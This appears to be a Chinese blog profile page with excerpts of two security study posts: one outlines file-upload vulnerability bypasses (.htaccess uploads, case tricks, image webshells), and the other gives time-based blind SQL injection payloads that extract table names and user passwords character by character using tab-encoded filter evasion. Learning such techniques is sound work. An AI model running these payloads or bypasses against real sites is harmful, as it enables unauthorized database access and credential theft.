- 博客(2)
- 收藏
- 关注
RSS订阅原创 文件上传漏洞
服务器检测(1:黑名单、白名单:2:MIME——是描述消息类型的因特网标准,MIME消息可描述文本、图像、音频、视频等数据。方式:1:.htaccess文件上传(通常情况下,上传.htaccess文件和其他文件(如jpg文件)是为了实现一些特定的功能或绕过服务器的限制。),大小写绕过,apache文件解析,配合文件包含漏洞绕过(图片马)原理:上传各种文件(jpg,php等)、脚本、 .exe ,没有限制文件以及过滤检查,达到控制同一服务器下的网站,获取敏感信息,上传成功通过webshell工具连接。
2024-04-01 21:25:49
183
原创 sql注入基本原理及联合注入,报错注入,时间盲注,布尔盲注
表名1'%09and%09if((left((select%09table_name%09from%09information_schema.tables%09where%09table_schema=database()%09limit%093,1),1)='u'),sleep(3),1)--%09-判断字段首字母1'%09and%09if((left((select%09password%09from%09users%09limit%090,1),1)='D'),sleep(3),1)--%09-
2024-03-30 12:20:41
657
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人